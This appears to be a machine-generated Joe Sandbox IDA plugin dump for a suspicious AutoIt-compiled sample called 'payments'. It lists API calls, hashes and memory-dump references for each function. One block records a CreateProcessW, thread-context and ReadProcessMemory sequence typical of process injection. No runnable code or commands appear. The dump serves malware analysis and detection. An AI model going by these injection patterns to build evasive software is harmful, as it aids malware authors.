                                                                                                                          • String ID: (e$HA$xf
                                                                                                                          • API String ID: 3815369404-379937699
                                                                                                                          • Opcode ID: bc036831b413f0b8d4ef9883a65d330ec70cc8f67f597f7f29921f62ac417413
                                                                                                                          • Instruction ID: dbd0c83b61f532bac5c62fb53e2986533fb26ff07608362df684ee65a80719ce
                                                                                                                          • Opcode Fuzzy Hash: bc036831b413f0b8d4ef9883a65d330ec70cc8f67f597f7f29921f62ac417413
                                                                                                                          • Instruction Fuzzy Hash: E071D1BC9013819BCB04EF6AE896758BBA4F759346B80466EDD1AC7B71DB304804CF39
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 010ACFE0: Sleep.KERNELBASE(000001F4), ref: 010ACFF1
                                                                                                                          • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 010AD21D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1359173157.00000000010AA000.00000040.00000020.00020000.00000000.sdmp, Offset: 010AA000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_10aa000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateFileSleep
                                                                                                                          • String ID: 85RHLDAIO9WR624J5HD
                                                                                                                          • API String ID: 2694422964-824319245
                                                                                                                          • Opcode ID: 6a3c55228ce07b8a19c89776ce663e70443f65541c2ac03ed716913e8453cac0
                                                                                                                          • Instruction ID: 63dc302b35f415d9764e4775135e5393b72608236f19dce092d13b799c55bd52
                                                                                                                          • Opcode Fuzzy Hash: 6a3c55228ce07b8a19c89776ce663e70443f65541c2ac03ed716913e8453cac0
                                                                                                                          • Instruction Fuzzy Hash: 1651A270D0424DEBEF11DBE4C814BEEBBB9AF15300F404199E648BB2C1D6B95B45CBA5
                                                                                                                          APIs
                                                                                                                          • _memset.LIBCMT ref: 00C9522F
                                                                                                                          • _wcscpy.LIBCMT ref: 00C95283
                                                                                                                          • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00C95293
                                                                                                                          • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00D03CB0
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: IconLoadNotifyShell_String_memset_wcscpy
                                                                                                                          • String ID: Line:
                                                                                                                          • API String ID: 1053898822-1585850449
                                                                                                                          • Opcode ID: 93d4742d570b9dad0c80d85264981b820d1b04d8e176a235dffa297f5e7610d5
                                                                                                                          • Instruction ID: 3c3e29205e955db7740819044f2a954dcf382ff21d5b8da552406d7074e189f9
                                                                                                                          • Opcode Fuzzy Hash: 93d4742d570b9dad0c80d85264981b820d1b04d8e176a235dffa297f5e7610d5
                                                                                                                          • Instruction Fuzzy Hash: 5731DF75008740AFDB26EB60DC4AFDFB7D8AF44300F00451EF999921D1EB70A648DBA6
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00C941A9: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,00C939FE,?,00000001), ref: 00C941DB
                                                                                                                          • _free.LIBCMT ref: 00D036B7
                                                                                                                          • _free.LIBCMT ref: 00D036FE
                                                                                                                            • Part of subcall function 00C9C833: __wsplitpath.LIBCMT ref: 00C9C93E
                                                                                                                            • Part of subcall function 00C9C833: _wcscpy.LIBCMT ref: 00C9C953
                                                                                                                            • Part of subcall function 00C9C833: _wcscat.LIBCMT ref: 00C9C968
                                                                                                                            • Part of subcall function 00C9C833: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 00C9C978
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _free$CurrentDirectoryLibraryLoad__wsplitpath_wcscat_wcscpy
                                                                                                                          • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                                                                          • API String ID: 805182592-1757145024
                                                                                                                          • Opcode ID: 0bad09b2914d134a4f5733f0752bd25ee47f57bec8a081aad551e19e33a64ab8
                                                                                                                          • Instruction ID: 06d789a607ec4479fb4001f49d7931f61a9506af7daec9230ae9a445bcffcafe
                                                                                                                          • Opcode Fuzzy Hash: 0bad09b2914d134a4f5733f0752bd25ee47f57bec8a081aad551e19e33a64ab8
                                                                                                                          • Instruction Fuzzy Hash: DA916F71910219AFCF04EFA4CC95AEDB7B8BF19314F54442AF81AAB291DB31DA05DB60
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00C95374: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,,?,00C961FF,?,00000000,00000001,00000000), ref: 00C95392
                                                                                                                            • Part of subcall function 00C949FB: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00C94A1D
                                                                                                                          • _wcscat.LIBCMT ref: 00D02D80
                                                                                                                          • _wcscat.LIBCMT ref: 00D02DB5
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _wcscat$FileModuleNameOpen
                                                                                                                          • String ID: \$\Include\
                                                                                                                          • API String ID: 3592542968-2640467822
                                                                                                                          • Opcode ID: c576ff1aa868cfc21a612a7d4bf7065f7f1bee3bf30496a1d22ed1c4a750dbb4
                                                                                                                          • Instruction ID: d13d2d60756f7f0404180b9fe17cfd447bd4d6603e0009995c19a6afcc58753a
                                                                                                                          • Opcode Fuzzy Hash: c576ff1aa868cfc21a612a7d4bf7065f7f1bee3bf30496a1d22ed1c4a750dbb4
                                                                                                                          • Instruction Fuzzy Hash: B5514D764057409BCB04EF65E995DABB7F4BB5A301B40452EFA49D33A0EB309A0CDB72
                                                                                                                          APIs
                                                                                                                          • __getstream.LIBCMT ref: 00CB34FE
                                                                                                                            • Part of subcall function 00CB7C0E: __getptd_noexit.LIBCMT ref: 00CB7C0E
                                                                                                                          • @_EH4_CallFilterFunc@8.LIBCMT ref: 00CB3539
                                                                                                                          • __wopenfile.LIBCMT ref: 00CB3549
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
                                                                                                                          • String ID: <G
                                                                                                                          • API String ID: 1820251861-2138716496
                                                                                                                          • Opcode ID: 7ff692402a7029d137d3e64e845e9f008c132c092a2a10c64906f3c22dd06b01
                                                                                                                          • Instruction ID: d79d4bdf11ebb516def1880a2d7cc8fc218353e30c443062ace3396f978f8ac2
                                                                                                                          • Opcode Fuzzy Hash: 7ff692402a7029d137d3e64e845e9f008c132c092a2a10c64906f3c22dd06b01
                                                                                                                          • Instruction Fuzzy Hash: 16112971A002169FDB22BF758C426EF3AA4AF45750F148925F825DB281EB34CF05BBB1
                                                                                                                          APIs
                                                                                                                          • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00CAD28B,SwapMouseButtons,00000004,?), ref: 00CAD2BC
                                                                                                                          • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00CAD28B,SwapMouseButtons,00000004,?,?,?,?,00CAC865), ref: 00CAD2DD
                                                                                                                          • RegCloseKey.KERNELBASE(00000000,?,?,00CAD28B,SwapMouseButtons,00000004,?,?,?,?,00CAC865), ref: 00CAD2FF
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                                          • String ID: Control Panel\Mouse
                                                                                                                          • API String ID: 3677997916-824357125
                                                                                                                          • Opcode ID: 02e2e3c109de2a41fe0e30b426fc6a5a8f0a8bc144e72e6ecd4634198e359b89
                                                                                                                          • Instruction ID: a06bae20b6cb1bca4badd78bb125081915d3caf3512bd80116fade538bf71cfd
                                                                                                                          • Opcode Fuzzy Hash: 02e2e3c109de2a41fe0e30b426fc6a5a8f0a8bc144e72e6ecd4634198e359b89
                                                                                                                          • Instruction Fuzzy Hash: 35112A75612219BFDF108F64CC84EEE7BB8EF49748B108569B806D7220D7719E419B61
                                                                                                                          APIs
                                                                                                                          • CreateProcessW.KERNELBASE(?,00000000), ref: 010AC79B
                                                                                                                          • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 010AC831
                                                                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 010AC853
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1359173157.00000000010AA000.00000040.00000020.00020000.00000000.sdmp, Offset: 010AA000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_10aa000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2438371351-0
                                                                                                                          • Opcode ID: e3f14b9100784c2d13b4d96e4da997e342e741b63af52aad6d222721779d43e7
                                                                                                                          • Instruction ID: 30474ca09934a6313014697b9909ff0c8b1e45d3ecc96e32159622d932078536
                                                                                                                          • Opcode Fuzzy Hash: e3f14b9100784c2d13b4d96e4da997e342e741b63af52aad6d222721779d43e7
                                                                                                                          • Instruction Fuzzy Hash: 2A622B30A14258DBEB24CFA4C950BDEB772EF58300F5091A9D24DEB390E7769E81CB59
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00C94517: _fseek.LIBCMT ref: 00C9452F
                                                                                                                            • Part of subcall function 00CDC56D: _wcscmp.LIBCMT ref: 00CDC65D
                                                                                                                            • Part of subcall function 00CDC56D: _wcscmp.LIBCMT ref: 00CDC670
                                                                                                                          • _free.LIBCMT ref: 00CDC4DD
                                                                                                                          • _free.LIBCMT ref: 00CDC4E4
                                                                                                                          • _free.LIBCMT ref: 00CDC54F
                                                                                                                            • Part of subcall function 00CB1C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00CB7A85), ref: 00CB1CB1
                                                                                                                            • Part of subcall function 00CB1C9D: GetLastError.KERNEL32(00000000,?,00CB7A85), ref: 00CB1CC3
                                                                                                                          • _free.LIBCMT ref: 00CDC557
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1552873950-0
                                                                                                                          • Opcode ID: 2db9d723d2f1f24614347a7e6fc8c80c315d14cd5ac174f49895e1fbecc6b5fc
                                                                                                                          • Instruction ID: 224195837234d490c16cd00e34b7caae5752d9657398533511e3efbd63e3299e
                                                                                                                          • Opcode Fuzzy Hash: 2db9d723d2f1f24614347a7e6fc8c80c315d14cd5ac174f49895e1fbecc6b5fc
                                                                                                                          • Instruction Fuzzy Hash: 04515BB1904219AFDF259F64DC81AAEBBB9EF48300F1040AEF619A3251DB715E80DF58
                                                                                                                          APIs
                                                                                                                          • _memset.LIBCMT ref: 00CAEBB2
                                                                                                                            • Part of subcall function 00C951AF: _memset.LIBCMT ref: 00C9522F
                                                                                                                            • Part of subcall function 00C951AF: _wcscpy.LIBCMT ref: 00C95283
                                                                                                                            • Part of subcall function 00C951AF: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00C95293
                                                                                                                          • KillTimer.USER32(?,00000001,?,?), ref: 00CAEC07
                                                                                                                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00CAEC16
                                                                                                                          • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00D03C88
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1378193009-0
                                                                                                                          • Opcode ID: 087d87a30650bd70524224fdf5229a72581327256a0063f2cf7e065b66298a4b
                                                                                                                          • Instruction ID: c5f6af36217cb47920d0473a6c3281b0916f2d9ea6e79bebfafb28a7deaecfd9
                                                                                                                          • Opcode Fuzzy Hash: 087d87a30650bd70524224fdf5229a72581327256a0063f2cf7e065b66298a4b
                                                                                                                          • Instruction Fuzzy Hash: CF21D774504794AFF7339B288859BEBBBEC9B0231CF04048DE69E962C1C7746A84CB65
                                                                                                                          APIs
                                                                                                                          • _memset.LIBCMT ref: 00D03725
                                                                                                                          • GetOpenFileNameW.COMDLG32 ref: 00D0376F
                                                                                                                            • Part of subcall function 00C9660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C953B1,?,?,00C961FF,?,00000000,00000001,00000000), ref: 00C9662F
                                                                                                                            • Part of subcall function 00C940A7: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00C940C6
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Name$Path$FileFullLongOpen_memset
                                                                                                                          • String ID: X
                                                                                                                          • API String ID: 3777226403-3081909835
                                                                                                                          • Opcode ID: 450332b12807e056088a334e4070132c574577f85095f90cb396dade70a89b23
                                                                                                                          • Instruction ID: 9001ebd393e5fa4449c8c72247a6e2ae2539c73d55352c4dcac8ca06cdf90976
                                                                                                                          • Opcode Fuzzy Hash: 450332b12807e056088a334e4070132c574577f85095f90cb396dade70a89b23
                                                                                                                          • Instruction Fuzzy Hash: B921A571A10298ABCF05DF98C849BDEBBFD9F49304F108059E405E7281DBB49A8A9F65
                                                                                                                          APIs
                                                                                                                          • GetTempPathW.KERNEL32(00000104,?), ref: 00CDC72F
                                                                                                                          • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00CDC746
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Temp$FileNamePath
                                                                                                                          • String ID: aut
                                                                                                                          • API String ID: 3285503233-3010740371
                                                                                                                          • Opcode ID: 21028ca4d0569318af763b78c17b206cb1a4a84651ddf6748924b8392dfec400
                                                                                                                          • Instruction ID: 1fba2d8b7b2fa41aec1905eef068260e657288b789f5966d05b174c7de40869f
                                                                                                                          • Opcode Fuzzy Hash: 21028ca4d0569318af763b78c17b206cb1a4a84651ddf6748924b8392dfec400
                                                                                                                          • Instruction Fuzzy Hash: 45D05E7550030EBBDB10AB90DC0EFCA776C9708704F0041A07660E91B1DBB4E69A8B68
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 23c17fff19018fd1ee5c60cec52f9992786c8891ce425bb146247f580093769f
                                                                                                                          • Instruction ID: 0c398b1a3e6b9815fc51ed65595313ee9b261f4b3a2a9b64bd62d1bbfbf80ee3
                                                                                                                          • Opcode Fuzzy Hash: 23c17fff19018fd1ee5c60cec52f9992786c8891ce425bb146247f580093769f
                                                                                                                          • Instruction Fuzzy Hash: 27F16C716083419FCB10DF29C885B5ABBE5FF88314F14892EF9959B392D774E906CB82
                                                                                                                          APIs
                                                                                                                          • _memset.LIBCMT ref: 00C95022
                                                                                                                          • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00C950CB
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: IconNotifyShell__memset
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 928536360-0
                                                                                                                          • Opcode ID: 11f404d21ab6f60251761f1d78526ed789013ca308238860c98c47c2d90117cb
                                                                                                                          • Instruction ID: 829e76bb211bfb851222a5819b959a3c224ef7fe1b45a23d486f785a551c8514
                                                                                                                          • Opcode Fuzzy Hash: 11f404d21ab6f60251761f1d78526ed789013ca308238860c98c47c2d90117cb
                                                                                                                          • Instruction Fuzzy Hash: 203150B5504701DFD721DF25D84979BBBE8FF48309F00092EE99AC6391E771AA44CBA2
                                                                                                                          APIs
                                                                                                                          • __FF_MSGBANNER.LIBCMT ref: 00CB3973
                                                                                                                            • Part of subcall function 00CB81C2: __NMSG_WRITE.LIBCMT ref: 00CB81E9
                                                                                                                            • Part of subcall function 00CB81C2: __NMSG_WRITE.LIBCMT ref: 00CB81F3
                                                                                                                          • __NMSG_WRITE.LIBCMT ref: 00CB397A
                                                                                                                            • Part of subcall function 00CB821F: GetModuleFileNameW.KERNEL32(00000000,00D50312,00000104,00000000,00000001,00000000), ref: 00CB82B1
                                                                                                                            • Part of subcall function 00CB821F: ___crtMessageBoxW.LIBCMT ref: 00CB835F
                                                                                                                            • Part of subcall function 00CB1145: ___crtCorExitProcess.LIBCMT ref: 00CB114B
                                                                                                                            • Part of subcall function 00CB1145: ExitProcess.KERNEL32 ref: 00CB1154
                                                                                                                            • Part of subcall function 00CB7C0E: __getptd_noexit.LIBCMT ref: 00CB7C0E
                                                                                                                          • RtlAllocateHeap.NTDLL(00E70000,00000000,00000001,00000001,00000000,?,?,00CAF507,?,0000000E), ref: 00CB399F
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1372826849-0
                                                                                                                          • Opcode ID: 965d1c5d1a176965e659e61ddffd8d2f837a7cb8add712eced79b191d3c9eeb6
                                                                                                                          • Instruction ID: eeef9e07bb8b6693c0e90884626b1d09371403caf3a0b46443d6b999a3516172
                                                                                                                          • Opcode Fuzzy Hash: 965d1c5d1a176965e659e61ddffd8d2f837a7cb8add712eced79b191d3c9eeb6
                                                                                                                          • Instruction Fuzzy Hash: 6601F531785351AAE6223B29EC56AEE374C9BC1761F640129FD11DB282DFB09E009AA0
                                                                                                                          APIs
                                                                                                                          • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00CDC385,?,?,?,?,?,00000004), ref: 00CDC6F2
                                                                                                                          • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00CDC385,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00CDC708
                                                                                                                          • CloseHandle.KERNEL32(00000000,?,00CDC385,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00CDC70F
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$CloseCreateHandleTime
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3397143404-0
                                                                                                                          • Opcode ID: e49546627062e40e38bbf636b0f68f7499f0e9493b0c906eb71cc426c9185b0c
                                                                                                                          • Instruction ID: b98c06d68b21610bf23ae03111de4140831dbaadc4b386c7746f941372d0506a
                                                                                                                          • Opcode Fuzzy Hash: e49546627062e40e38bbf636b0f68f7499f0e9493b0c906eb71cc426c9185b0c
                                                                                                                          • Instruction Fuzzy Hash: ABE08632180314BBD7211B54AC09FCA7B19AB05760F108111FB24A91E0DBB1265287A8
                                                                                                                          APIs
                                                                                                                          • _free.LIBCMT ref: 00CDBB72
                                                                                                                            • Part of subcall function 00CB1C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00CB7A85), ref: 00CB1CB1
